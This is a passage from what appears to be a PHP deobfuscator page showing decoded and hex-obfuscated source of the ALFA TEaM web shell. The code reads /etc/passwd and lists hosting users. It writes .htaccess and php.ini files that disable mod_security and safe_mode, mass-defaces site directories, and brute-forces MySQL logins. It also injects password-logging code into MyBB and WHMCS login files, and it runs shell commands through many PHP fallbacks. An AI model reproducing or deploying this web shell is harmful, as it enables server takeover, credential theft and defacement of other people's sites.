<form onsubmit="g('safe',null,null,null,null,null,null,'valiases',this.site.value,null,'>>'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>"; if (isset($_POST["alfa9"]) && $_POST["alfa9"] == ">>") { if (!_alfa_file_exists("/etc/virtual/domainowners")) { $site = trim($_POST["alfa7"]); $rep = str_replace(array("https://", "http://", "www."), '', $site); $user = ''; if (function_exists("posix_getpwuid") && function_exists("fileowner")) { if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) { $user = $user["name"]; } } else { if (_alfa_can_runCommand(true, true)) { $user = alfaEx("stat -c '%U' /etc/valiases/" . $rep); } } if (!empty($user) && $user != "root") { echo __pre() . "<center><table border='1'><tr><td><b><font color="#FFFFFF">User: </b></font></td><td><b><font color="#FF0000">{$user}</font></b></td></tr><tr><td><b><font color="#FFFFFF">site: </b></font></td><td><b><font color="#FF0000">{$rep}</font></b></td></tr></table></center>"; } else { echo __pre() . "<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>"; } } else { $site = trim($_POST["alfa7"]); $rep = str_replace(array("https://", "http://", "www."), '', $site); $users = _alfa_file("/etc/virtual/domainowners"); foreach ($users as $boz) { $ex = explode(":", $boz); if ($ex[0] == $rep) { echo __pre() . "<center><table border='1'>\xa<tr><td><b><font color="#FFFFFF">User: </b></font></td><td><b><font color="#FF0000">" . trim($ex[1]) . "</font></b></td></tr>
<tr><td><b><font color="#FFFFFF">site: </b></font></td><td><b><font color="#FF0000">{$rep}</font></b></td></tr></table></center>"; break; } } } } } if (!empty($_POST["alfa5"]) && isset($_POST["alfa5"])) { if (!_alfa_file_exists("/etc/virtual/domainowners")) { echo __pre(); $i = 0; while ($i < 60000) { $line = @posix_getpwuid($i); if (!empty($line)) { while (list($key, $vl) = each($line)) { echo $vl . "\xa"; break; } } $i++; } } else { echo __pre(); $users = _alfa_file("/etc/virtual/domainowners"); foreach ($users as $boz) { $user = explode(":", $boz); echo trim($user[1]) . "<br>"; } } } if (!empty($_POST["alfa4"]) && isset($_POST["alfa4"])) { echo __pre(); if (_alfa_can_runCommand(true, true)) { echo __read_file("/etc/passwd"); } elseif (function_exists("posix_getpwuid")) { for ($uid = 0; $uid < 60000; $uid++) { $ara = @posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { echo "{$val}:"; } echo "\xa"; } } } else { __alert("failed..."); } } if (!empty($_POST["alfa2"]) && isset($_POST["alfa2"])) { @__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible
<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off\xa</IfModule>"); echo "<center><b><big>htaccess for Apache created...!</center></b></big>"; } if (!empty($_POST["alfa1"]) && isset($_POST["alfa1"])) { @__write_file($GLOBALS["cwd"] . "php.ini", "safe_mode=OFF\xadisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)"); echo "<center><b><big> php.ini created...!</center></b></big>"; } if (!empty($_POST["alfa3"]) && isset($_POST["alfa3"])) { @__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible\xa<Files *.php>
ForceType application/x-httpd-php4\xa</Files>\xa<IfModule mod_security.c>\xaSecFilterEngine Off
SecFilterScanPOST Off
</IfModule>"); echo "<center><b><big>htaccess for Litespeed created...!</center></b></big>"; } echo "<br></div>"; alfafooter(); } goto EoAWA; K8RV4: function alfaMassDefacer() { alfahead(); AlfaNum(5, 6, 7, 8, 9, 10); echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit="g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;" method='post'>"; echo "<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>\xa	Mass dir: <input size="50" id="target" type="text" name="massdir" value="" . htmlspecialchars($GLOBALS["cwd"]) . "">
\x9DefPage: <input size="50" type="text" name="defpage" value="" . htmlspecialchars($GLOBALS["cwd"]) . ""></div> <input type="submit" name="btn" value=" "></center></p>
</form>"; $dir = $_POST["alfa1"]; $defpage = $_POST["alfa2"]; $method = $_POST["alfa3"]; $fCurrent = $GLOBALS["__file_path"]; if ($_POST["alfa4"] == ">>") { if (!empty($dir)) { if (@is_dir($dir)) { if (@is_readable($dir)) { if (@is_file($defpage)) { if ($dh = @opendir($dir)) { echo __pre(); while (($file = @readdir($dh)) !== false) { if ($file == ".." || $file == ".") { continue; } $newfile = $dir . $file; if ($fCurrent == $newfile) { continue; } if (@is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } else { if (!@is_writable($newfile)) { continue; } if (!@is_readable($newfile)) { continue; } Alfa_Rewriter($newfile, $file, $defpage, $method); } } closedir($dh); } else { __alert("<font color="red">Error In OpenDir...</font>"); } } else { __alert("<font color="red">DefPage File NotFound...</font>"); } } else { __alert("<font color="red">Directory is not Readable...</font>"); } } else { __alert("<font color="red">Mass Dir is Invalid Dir...</font>"); } } else { __alert("<font color="red">Dir is Empty...</font>"); } } echo "</div>"; alfafooter(); } goto Xrfh9; L6Kl6: function _AlfaSecretKey() { $secret = @$_COOKIE["AlfaSecretKey"]; if (!isset($_COOKIE["AlfaSecretKey"])) { $secret = uniqid(mt_rand(), true); __alfa_set_cookie("AlfaSecretKey", $secret); } return $secret; } goto PuSe1; KtNd0: function _alfa_php_cmd($in, $re = false) { $out = ''; try { if ($re) { $in = $in . " 2>&1"; } if (function_exists("exec")) { @exec($in, $out); $out = @join("
", $out); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists("shell_exec")) { $out = shell_exec($in); } elseif (function_exists("popen") && function_exists("pclose")) { if (is_resource($f = @popen($in, "r"))) { $out = ''; while (!@feof($f)) { $out .= fread($f, 1024); } pclose($f); } } elseif (function_exists("proc_open")) { $pipes = array(); $process = @proc_open($in . " 2>&1", array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $out = @stream_get_contents($pipes[1]); } elseif (class_exists("COM")) { $alfaWs = new COM("WScript.shell"); $exec = $alfaWs->exec("cmd.exe /c " . $_POST["alfa1"]); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } catch (Exception $e) { } return $out; } goto GIU6h; qpgQy: function hijackMybb($path, $saveto) { $code = "$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = '".$user['username']."'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user['username']." : ". $user['password']." ( ".$alfa_fetch['email']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);"; $find = "$loginhandler->complete_login();"; $code = str_replace("{saveto_path}", $saveto, $code); $login = $path . "/member.php"; $evil_login = "	" . $code . "
	" . $find; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto L8sC_; dptXn: if (!function_exists("mb_strlen")) { function mb_strlen($str, $c = '') { return strlen($str); } } goto JM3pb; P95rf: function alfaconfig_grabber() { alfahead(); echo "<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>"; echo "<form name="srch" onSubmit="g('config_grabber',null,null,this.dir.value,this.ext.value,null,'>>');return false;" method='post'>\xa\x9<div class="txtfont">\xa	Dir: <input size="50" id="target" type="text" name="dir" value="" . $GLOBALS["cwd"] . "">
	Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
	<input type="submit" name="btn" value=" "></div></form></center><br>"; $dir = $_POST["alfa2"]; $ext = $_POST["alfa3"]; if ($_POST["alfa5"] == ">>") { echo __pre(); Alfa_ConfigGrabber($dir, $ext); } echo "</div>"; alfafooter(); } goto RiRhw; FN_bJ: if ($GLOBALS["cwd"][strlen($GLOBALS["cwd"]) - 1] != "/") { $GLOBALS["cwd"] .= "/"; } goto jL3tA; r05Ia: foreach ($GLOBALS["DB_NAME"] as $key => $value) { $prefix = substr($key, 0, 2); if ($prefix == "us") { $GLOBALS["DB_NAME"]["user"] = $value; $GLOBALS["DB_NAME"]["user_rand"] = $key; } elseif ($prefix == "pa") { $GLOBALS["DB_NAME"]["pass"] = $value; $GLOBALS["DB_NAME"]["pass_rand"] = $key; } elseif ($prefix == "sa") { $GLOBALS["DB_NAME"]["safemode"] = $value; $GLOBALS["DB_NAME"]["safemode_rand"] = $key; } elseif ($prefix == "lo") { $GLOBALS["DB_NAME"]["login_page"] = $value; $GLOBALS["DB_NAME"]["login_page_rand"] = $key; } elseif ($prefix == "sh") { $GLOBALS["DB_NAME"]["show_icons"] = $value; $GLOBALS["DB_NAME"]["show_icons_rand"] = $key; } elseif ($prefix == "po") { $GLOBALS["DB_NAME"]["post_encryption"] = $value; $GLOBALS["DB_NAME"]["post_encryption_rand"] = $key; } elseif ($prefix == "cg") { $GLOBALS["DB_NAME"]["cgi_api"] = $value; $GLOBALS["DB_NAME"]["cgi_api_rand"] = $key; } } goto GuGa9; qyBzk: ?>

Did this file decode correctly?

Original Code

<?php  } } goto I6J3n; LsgNQ: function alfaget_flags() { $flags = array(); if (function_exists("\143\x75\x72\x6c\137\166\145\x72\x73\x69\157\x6e")) { $curl = new AlfaCURL(); $server_addr = !@$_SERVER["\123\x45\122\x56\x45\122\137\101\x44\104\122"] ? function_exists("\147\x65\x74\150\x6f\x73\x74\x62\171\156\x61\x6d\145") ? @gethostbyname($_SERVER["\123\x45\122\126\x45\x52\x5f\116\x41\x4d\105"]) : "\77\77\x3f\77" : @$_SERVER["\x53\105\122\126\105\122\137\101\104\x44\122"]; $flag = $curl->Send("\x68\x74\164\160\72\57\x2f\167\x77\167\x2e\x67\x65\157\160\x6c\x75\x67\x69\156\x2e\x6e\x65\164\57\152\x73\157\156\56\x67\x70\77\151\160\75" . $server_addr); $flag2 = $curl->Send("\150\x74\164\x70\x3a\x2f\57\167\x77\167\x2e\147\x65\157\x70\x6c\x75\x67\x69\x6e\56\x6e\x65\x74\57\152\163\x6f\x6e\56\x67\160\x3f\151\160\x3d" . $_SERVER["\x52\105\115\x4f\x54\105\x5f\x41\104\x44\122"]); if (strpos($flag2, "\147\x65\157\160\x6c\165\x67\x69\156") != false) { $flag = json_decode($flag, true); $flag2 = json_decode($flag2, true); if (!empty($flag["\147\x65\157\x70\154\x75\147\151\x6e\x5f\x63\x6f\165\156\164\162\171\x43\157\x64\x65"])) { $flags["\163\145\x72\x76\x65\162"]["\156\141\x6d\145"] = $flag["\x67\x65\157\x70\x6c\165\x67\x69\x6e\x5f\x63\x6f\165\x6e\164\162\171\x4e\x61\155\145"]; $flags["\x73\145\162\166\x65\x72"]["\x63\x6f\x64\x65"] = $flag["\x67\x65\157\160\x6c\x75\147\151\156\x5f\x63\x6f\x75\x6e\x74\162\x79\103\x6f\x64\145"]; } if (!empty($flag2["\x67\x65\157\x70\154\x75\x67\x69\156\137\143\x6f\165\156\x74\x72\x79\x43\x6f\144\145"])) { $flags["\x63\x6c\151\x65\x6e\x74"]["\156\141\155\x65"] = $flag2["\x67\x65\x6f\160\154\x75\x67\151\156\137\143\x6f\165\156\x74\162\171\x4e\x61\x6d\145"]; $flags["\x63\x6c\151\145\156\x74"]["\x63\x6f\144\145"] = $flag2["\x67\x65\157\x70\154\x75\x67\151\156\137\x63\x6f\165\156\x74\162\x79\x43\157\x64\145"]; } } } echo json_encode($flags); } goto Q03qj; ppnhy: if (!isset($GLOBALS["\x44\102\x5f\x4e\x41\x4d\x45"]["\154\x6f\x67\x69\156\x5f\160\141\147\145"])) { die("\x24\x47\x4c\117\102\x41\114\x53\x5b\47\104\x42\x5f\x4e\x41\115\x45\x27\x5d\x5b\47\x6c\x6f\147\x69\x6e\x5f\160\x61\147\145\x27\x5d"); } goto TMWW9; XTnlF: function __pre() { return "\74\160\x72\x65\x20\x69\x64\x3d\42\x73\x74\162\117\x75\x74\x70\x75\164\42\40\x73\x74\171\x6c\x65\x3d\42\155\141\x72\147\x69\x6e\55\x74\157\x70\x3a\x35\x70\x78\x22\x20\x63\x6c\x61\x73\x73\x3d\42\155\x6c\61\x22\x3e"; } goto KOYJ5; FVVeJ: function alfaSize($s) { if ($s >= 1073741824) { return sprintf("\45\x31\x2e\x32\x66", $s / 1073741824) . "\40\107\x42"; } elseif ($s >= 1048576) { return sprintf("\45\61\56\62\146", $s / 1048576) . "\40\x4d\x42"; } elseif ($s >= 1024) { return sprintf("\45\61\x2e\62\146", $s / 1024) . "\x20\113\x42"; } else { return $s . "\40\x42"; } } goto dfoFS; fCNwV: function Alfa_Mysql_Cracker($info) { if (@mysqli_connect($info["\164\x61\x72\x67\145\164"] . "\x3a" . $info["\x70\157\x72\164"], $info["\x75\x73\145\x72\x6e\141\x6d\x65"], $info["\x70\141\x73\163\x77\x6f\x72\144"])) { CrackerResualt($info); echo "\125\x73\x65\162\116\141\x6d\145\72\40\x3c\146\x6f\x6e\164\40\143\x6f\154\x6f\x72\75\42\162\145\x64\x22\76" . $info["\x75\x73\x65\162\x6e\x61\x6d\x65"] . "\x3c\x2f\146\157\x6e\x74\76\x20\120\x61\x73\163\127\157\162\x64\72\x20\x3c\x66\x6f\x6e\x74\x20\x63\157\x6c\x6f\x72\75\42\162\x65\144\x22\x3e" . $info["\160\141\163\x73\167\157\162\144"] . "\x3c\57\x66\157\156\164\x3e\x3c\x66\x6f\x6e\164\x20\x63\x6f\x6c\157\x72\75\42\x67\162\145\145\156\42\76\40\x20\114\157\147\151\156\40\x53\165\x63\143\145\163\x73\56\x2e\x2e\x2e\x3c\x2f\x66\157\x6e\164\76\74\x62\162\76"; } } goto i2b2c; kS5vr: function hijackWhmcs($path, $saveto) { $code = "\74\x3f\160\x68\160\x20\x69\146\50\151\x73\x73\x65\164\x28\44\137\x50\117\x53\124\x5b\47\165\163\x65\162\x6e\141\155\x65\x27\135\x29\x20\101\116\104\x20\151\163\163\145\164\x28\x24\x5f\120\x4f\123\124\x5b\47\160\x61\x73\163\x77\157\162\x64\x27\x5d\x29\40\x41\116\104\40\41\x65\155\x70\164\171\x28\x24\137\120\117\123\x54\133\x27\165\x73\145\162\156\x61\155\x65\47\135\x29\40\101\116\104\x20\x21\145\x6d\x70\164\x79\x28\44\137\x50\117\x53\124\x5b\47\160\141\x73\163\167\x6f\x72\x64\x27\x5d\51\x29\173\151\146\50\x24\141\154\146\141\x5f\x63\x6f\x6e\x6e\x65\143\164\75\x40\x6d\171\x73\161\x6c\151\137\143\157\x6e\156\145\x63\164\x28\44\144\142\137\150\157\x73\x74\54\44\x64\x62\137\x75\163\145\x72\x6e\141\x6d\145\x2c\44\144\142\x5f\160\x61\163\x73\x77\x6f\x72\x64\54\44\144\x62\137\156\x61\x6d\x65\51\x29\x7b\x24\x61\x6c\146\141\x5f\x66\151\x6c\145\x20\75\40\x22\173\x73\141\166\x65\x74\x6f\137\x70\x61\164\150\175\x22\73\x24\141\x6c\146\141\x5f\165\156\x61\x6d\145\x20\x3d\x20\x40\x24\137\120\x4f\x53\x54\133\47\x75\x73\x65\162\156\x61\x6d\x65\47\x5d\73\x24\141\154\x66\x61\x5f\x70\x77\x20\x3d\40\x40\x24\x5f\120\x4f\x53\124\133\x27\x70\x61\163\x73\167\157\x72\x64\x27\135\x3b\151\x66\x28\x69\163\163\x65\x74\50\44\137\x50\117\x53\x54\133\x27\x6c\x61\156\x67\x75\141\x67\x65\47\x5d\51\x29\173\x24\x61\154\x66\141\137\161\x20\75\x20\42\123\x45\x4c\x45\x43\x54\40\52\x20\106\x52\117\115\40\x74\x62\154\141\x64\x6d\x69\x6e\163\40\127\x48\x45\x52\x45\x20\x60\165\x73\x65\162\x6e\x61\x6d\x65\x60\40\75\40\x27\44\x61\154\x66\141\x5f\165\x6e\141\155\145\47\x20\101\x4e\104\x20\x60\x70\141\163\163\x77\x6f\x72\x64\x60\x20\75\40\x27\42\56\x6d\144\x35\x28\44\x61\x6c\146\141\137\160\x77\x29\x2e\42\x27\x22\73\44\x61\x64\x6d\151\156\40\x3d\x20\x74\x72\165\x65\x3b\175\x65\x6c\163\145\x7b\x24\x61\154\x66\x61\x5f\x71\40\x3d\x20\x22\x53\x45\x4c\105\103\124\x20\52\40\106\x52\117\x4d\x20\164\142\154\143\154\151\145\x6e\164\x73\x20\127\110\x45\x52\105\x20\x60\145\155\141\x69\x6c\140\x20\75\x20\x27\44\x61\154\146\141\137\x75\x6e\x61\x6d\145\x27\42\73\44\x61\144\155\151\x6e\40\x3d\40\x66\141\x6c\x73\x65\73\x7d\x24\141\154\x66\141\137\x71\165\145\162\x79\x20\75\40\x6d\171\163\x71\154\151\x5f\x71\x75\x65\x72\x79\x28\x24\x61\x6c\146\x61\137\143\157\156\x6e\145\143\164\x2c\x20\x24\x61\154\146\141\137\x71\x29\x3b\151\x66\x28\x6d\171\163\x71\x6c\151\x5f\156\165\x6d\x5f\162\x6f\167\163\50\x24\141\x6c\x66\141\137\x71\165\145\x72\171\x29\40\x3e\x20\60\x20\51\173\x24\x72\x6f\167\40\x3d\x20\x6d\x79\163\161\x6c\151\137\146\145\164\143\150\137\x61\x72\162\141\171\x28\44\x61\x6c\146\141\x5f\161\165\145\162\x79\51\x3b\44\x61\154\154\157\x77\40\75\x20\x74\162\x75\x65\73\x69\x66\50\x21\x24\141\x64\155\151\156\51\x7b\x24\x5f\137\x73\141\154\x74\40\75\x20\145\170\x70\154\157\144\x65\50\x27\72\x27\54\x20\44\162\157\167\133\x27\160\141\163\x73\167\x6f\x72\144\47\135\x29\x3b\44\x5f\x5f\x65\x6e\x63\120\x57\40\x3d\x20\x6d\x64\65\50\44\137\x5f\163\x61\154\164\133\61\x5d\56\x24\x5f\x50\x4f\123\x54\x5b\47\160\141\x73\x73\167\157\x72\144\x27\x5d\51\56\x27\72\x27\56\44\x5f\137\163\141\154\164\x5b\x31\135\x3b\151\x66\x28\44\x72\157\167\x5b\x27\160\x61\x73\163\167\x6f\x72\x64\x27\135\x20\x3d\x3d\40\x24\137\137\x65\156\x63\120\x57\x29\173\x24\141\x6c\154\157\167\40\75\x20\x74\162\x75\x65\x3b\x24\x72\157\167\x5b\x27\x75\163\x65\x72\x6e\x61\155\x65\x27\135\x20\75\x20\x24\x72\157\167\x5b\x27\x65\155\x61\151\x6c\x27\135\73\175\145\154\163\x65\173\x24\141\x6c\x6c\157\x77\40\x3d\40\146\x61\154\x73\145\73\x7d\175\x69\x66\50\44\141\154\154\157\x77\x29\x7b\x24\146\160\40\x3d\40\x40\146\157\160\x65\x6e\x28\x24\x61\x6c\x66\x61\x5f\x66\x69\154\x65\x2c\x20\x22\x61\53\42\x29\x3b\x40\146\167\162\151\x74\145\50\44\x66\160\54\40\44\162\157\x77\x5b\47\x75\163\x65\162\x6e\141\x6d\x65\x27\135\x20\56\40\47\40\x3a\x20\x27\x20\x2e\x20\x20\44\x61\154\146\141\x5f\160\x77\x2e\x22\x20\x28\42\x20\56\x20\44\x72\157\x77\x5b\42\x65\x6d\141\151\154\42\135\40\x2e\40\42\x29\40\x3a\x20\x22\56\50\44\x61\144\x6d\151\156\40\77\40\47\x69\163\137\141\x64\x6d\151\x6e\47\x20\72\x20\x27\x69\163\x5f\165\163\x65\x72\47\51\56\42\134\x6e\x22\x29\x3b\100\146\x63\x6c\x6f\x73\145\50\x24\x66\x70\51\x3b\x24\146\40\75\x20\x40\x66\151\x6c\x65\50\44\141\154\146\141\x5f\146\x69\x6c\x65\x29\73\x24\156\x65\x77\x20\75\x20\x61\162\x72\141\171\137\x75\x6e\x69\x71\x75\145\x28\44\x66\51\73\x24\146\x70\40\75\40\100\x66\x6f\x70\145\x6e\x28\x24\141\x6c\x66\x61\x5f\x66\x69\154\145\54\40\42\167\42\51\x3b\146\157\162\x65\x61\x63\150\50\x24\x6e\x65\167\40\141\x73\x20\44\x76\141\154\x75\145\x73\x29\173\100\x66\x77\162\151\x74\x65\x28\44\146\160\54\x20\x24\x76\141\x6c\165\145\163\x29\x3b\175\100\x66\143\x6c\157\163\145\x28\x24\146\160\51\x3b\x7d\175\x7d\x7d\x3f\x3e"; $code = str_replace("\173\x73\141\166\145\164\x6f\137\x70\141\164\150\175", $saveto, $code); $conf = $path . "\x2f\143\157\156\146\151\x67\x75\162\141\164\x69\157\156\56\x70\150\x70"; if (@is_file($conf) and @is_writable($conf)) { $data_conf = @file_get_contents($conf); if (!strstr($data_conf, "\x3f\x3e")) { $code = "\x3f\x3e" . $code; } $evil_conf = $data_conf . "\xa" . $code; @file_put_contents($conf, $evil_conf); hijackOutput(0, $saveto); } else { hijackOutput(1); } } goto qpgQy; kr6dX: function alfacloudflare() { alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4, 3); echo "\x3c\x64\x69\x76\x20\x63\x6c\141\163\163\75\150\x65\x61\144\x65\x72\76\74\x63\145\x6e\x74\145\x72\x3e\74\x62\x72\76\x3c\x64\x69\166\40\x63\x6c\x61\x73\x73\x3d\x27\x74\x78\164\146\157\x6e\x74\137\x68\145\141\x64\x65\x72\47\76\174\40\103\x6c\x6f\165\x64\x20\x46\154\141\162\145\x20\102\x79\x50\x61\163\163\x65\162\x20\174\x3c\57\144\151\x76\x3e\x3c\142\x72\76\74\x66\157\162\x6d\40\141\143\164\151\157\x6e\x3d\47\x27\40\157\x6e\163\165\142\x6d\151\164\75\x22\x67\50\x27\x63\x6c\x6f\165\x64\x66\x6c\141\x72\x65\x27\54\156\x75\154\x6c\x2c\x74\150\151\x73\x2e\x75\162\154\56\x76\141\154\x75\x65\54\47\x3e\x3e\47\x29\x3b\x20\x72\x65\x74\x75\x72\156\x20\146\x61\x6c\163\x65\x3b\42\40\x6d\x65\164\150\x6f\144\x3d\x27\x70\157\163\164\47\x3e\12\74\x70\x3e\74\144\151\166\x20\x63\154\x61\163\163\75\47\164\170\x74\146\x6f\x6e\164\47\76\124\x61\x72\147\145\x74\x3a\x3c\x2f\x64\x69\166\x3e\x20\x3c\x69\x6e\x70\165\x74\40\164\171\160\145\x3d\47\164\145\170\x74\47\40\x73\x69\x7a\x65\x3d\x33\x30\40\x6e\141\x6d\145\75\47\165\162\154\47\x20\163\x74\171\154\x65\75\47\x74\145\170\x74\55\x61\x6c\x69\x67\156\x3a\143\145\156\164\145\162\x3b\47\40\x70\x6c\141\x63\x65\x68\157\x6c\x64\145\162\x3d\x22\x74\x61\162\147\145\x74\x2e\143\157\155\x22\x3e\x20\74\151\x6e\160\x75\164\40\x74\x79\x70\145\75\47\163\x75\142\x6d\151\x74\47\40\156\x61\155\145\x3d\x27\x67\157\47\40\166\141\154\165\x65\x3d\47\40\47\40\x2f\x3e\74\57\x70\x3e\74\x2f\x66\157\162\155\x3e\74\x2f\143\x65\156\x74\x65\x72\x3e"; if ($_POST["\141\154\146\x61\x32"] && $_POST["\141\154\146\141\x32"] == "\76\76") { $url = $_POST["\x61\x6c\x66\x61\61"]; if (!preg_match("\x2f\x5e\50\x68\164\164\160\x73\77\x29\72\134\57\134\x2f\50\167\x7b\63\175\174\167\x33\51\x5c\56\x2f\151", $url)) { $url = preg_replace("\57\136\50\150\x74\x74\x70\163\77\x29\x3a\x5c\57\134\x2f\x2f", '', $url); $url = "\x68\164\x74\160\72\x2f\57\x77\x77\167\x2e" . $url; } $headers = @get_headers($url, 1); $server = $headers["\123\145\x72\x76\x65\x72"]; $subs = array("\x6f\167\x61\x2e", "\62\164\x74\x79\x2e", "\x6d\x2e", "\x67\x77\56", "\155\x78\x31\x2e", "\163\x74\x6f\x72\x65\56", "\61", "\62", "\x76\142\56", "\156\145\167\163\x2e", "\144\157\167\x6e\154\x6f\141\144\x2e", "\166\x69\144\145\x6f", "\143\x70\141\156\x65\x6c\56", "\x66\x74\x70\56", "\163\145\x72\x76\x65\162\61\56", "\143\x64\156\x2e", "\143\144\x6e\x32\x2e", "\156\163\x2e", "\156\x73\x33\56", "\x6d\141\151\x6c\x2e", "\167\x65\142\155\141\x69\x6c\56", "\144\151\x72\145\143\164\56", "\144\151\162\x65\x63\164\55\x63\x6f\156\x6e\145\143\x74\x2e", "\162\145\143\157\162\144\56", "\163\x73\x6c\x2e", "\144\156\163\x2e", "\150\x65\x6c\x70\x2e", "\142\x6c\x6f\x67\x2e", "\x69\x72\143\x2e", "\x66\x6f\x72\165\x6d\x2e", "\x64\x6c\56", "\x6d\171\x2e", "\143\160\x2e", "\160\157\162\164\x61\x6c\x2e", "\x6b\x62\x2e", "\163\x75\160\x70\x6f\162\x74\56", "\x73\x65\141\x72\143\150\56", "\x64\x6f\x63\163\56", "\146\151\x6c\x65\x73\x2e", "\141\x63\x63\157\x75\x6e\164\163\56", "\163\x65\143\165\x72\x65\56", "\162\x65\x67\x69\163\164\145\162\x2e", "\141\160\160\163\x2e", "\142\x65\x74\141\x2e", "\144\145\x6d\x6f\56", "\x73\155\x74\160\56", "\x6e\x73\x32\x2e", "\156\x73\61\x2e", "\163\145\162\x76\x65\x72\56", "\163\x68\157\160\x2e", "\150\x6f\163\164\x2e", "\167\145\x62\56", "\143\154\x6f\165\x64\56", "\x61\160\x69\x2e", "\145\170\x63\x68\x61\x6e\147\x65\x2e", "\x61\x70\160\56", "\x76\160\163\x2e", "\x6f\167\141\x2e", "\163\141\x74\56", "\142\142\x73\x2e", "\x6d\x6f\166\151\x65\x2e", "\x6d\x75\163\x69\143\x2e", "\x61\162\x74\56", "\x66\x75\163\151\x6f\156\56", "\155\141\x70\x73\x2e", "\x66\157\x72\x75\x6d\x73\x2e", "\141\143\x63\56", "\143\143\x2e", "\144\x65\x76\x2e", "\167\x77\64\62\56", "\x77\151\x6b\x69\56", "\x63\154\x69\145\x6e\x74\163\x2e", "\143\x6c\151\x65\156\x74\56", "\142\157\157\153\163\56", "\141\x6e\x73\167\x65\162\x73\x2e", "\163\145\x72\166\x69\143\x65\x2e", "\x67\x72\x6f\165\160\163\56", "\x69\155\141\x67\145\163\x2e", "\165\x70\154\157\141\x64\x2e", "\x75\x70\56", "\164\165\142\x65\x2e", "\x75\163\145\162\x73\x2e", "\141\144\155\x69\x6e\56", "\141\x64\x6d\x69\156\151\163\x74\x72\x61\x74\157\x72\x2e", "\x70\x72\151\x76\141\164\x65\56", "\144\145\163\151\x67\156\x2e", "\167\150\155\143\163\56", "\x77\x70\56", "\167\x6f\x72\x64\x70\162\145\163\x73\x2e", "\152\x6f\157\x6d\154\x61\56", "\x76\142\165\154\154\x65\164\x69\x6e\56", "\x74\145\x73\x74\56", "\144\x65\x76\x65\x6c\157\x70\x65\162\56", "\x70\x61\156\145\x6c\x2e", "\x63\157\156\x74\141\143\164\x2e"); if (preg_match("\x2f\x5e\50\150\x74\x74\160\x73\77\x29\x3a\x5c\57\134\x2f\x28\167\x7b\63\x7d\x7c\167\x33\51\134\x2e\57\x69", $url, $matches)) { if ($matches[2] != "\x77\167\x77") { $url = preg_replace("\x2f\x5e\x28\150\164\x74\x70\163\77\x29\x3a\134\57\x5c\57\x2f", '', $url); } else { $url = explode($matches[0], $url); $url = $url[1]; } } if (is_array($server)) { $server = $server[0]; } echo __pre(); if (preg_match("\57\x63\x6c\157\x75\144\x66\x6c\x61\162\x65\57\151", $server)) { echo "\xa\133\53\135\40\103\x6c\x6f\x75\144\x46\154\141\x72\145\x20\144\x65\164\145\x63\x74\145\x64\x3a\x20{$server}\xa\x3c\142\x72\76"; } else { echo "\12\133\x2b\x5d\x20\x43\154\x6f\165\144\x46\x6c\141\x72\145\x20\167\x61\x73\156\x27\164\40\144\x65\164\x65\x63\164\145\144\54\x20\x70\x72\157\143\x65\145\144\x69\156\147\40\x61\156\x79\167\x61\x79\56\12"; } echo "\x5b\x2b\135\40\103\154\157\165\144\106\154\141\162\x65\40\x49\x50\72\x20" . is_ipv4(gethostbyname($url)) . "\12\12\x3c\142\x72\x3e\74\x62\162\x3e"; echo "\133\x2b\x5d\x20\123\x65\x61\162\x63\150\151\x6e\147\x20\146\157\x72\x20\155\x6f\x72\145\x20\x49\120\40\141\x64\x64\x72\x65\163\x73\x65\163\x2e\xa\xa\74\x62\x72\76\x3c\142\162\76"; for ($x = 0; $x < count($subs); $x++) { $site = $subs[$x] . $url; $ip = is_ipv4(gethostbyname($site)); if ($ip == "\x28\116\165\154\154\x29") { continue; } echo "\124\162\171\151\156\147\40{$site}\72\40{$ip}\12\x3c\142\x72\x3e"; } echo "\xa\133\x2b\x5d\40\x46\x69\156\151\163\150\x65\x64\56\12\74\x62\162\x3e"; } echo "\74\57\144\151\x76\76"; alfafooter(); } goto SXwEV; GIU6h: function _alfa_fsockopen($server, $uri, $post) { $socket = @fsockopen($server, 80, $errno, $errstr, 15); if ($socket) { $http = "\120\117\x53\x54\x20{$uri}\x20\x48\124\x54\120\57\x31\x2e\60\xd\12"; $http .= "\110\157\163\x74\x3a\x20{$server}\15\xa"; $http .= "\125\163\x65\x72\55\101\x67\145\156\x74\72\x20" . $_SERVER["\110\124\124\120\x5f\x55\x53\105\x52\137\101\x47\105\x4e\124"] . "\15\12"; $http .= "\103\157\x6e\x74\x65\156\x74\x2d\124\171\x70\145\x3a\x20\141\160\x70\x6c\151\143\x61\164\151\157\x6e\57\170\55\167\x77\167\55\x66\x6f\x72\x6d\x2d\x75\162\154\145\x6e\x63\157\x64\145\144\15\xa"; $http .= 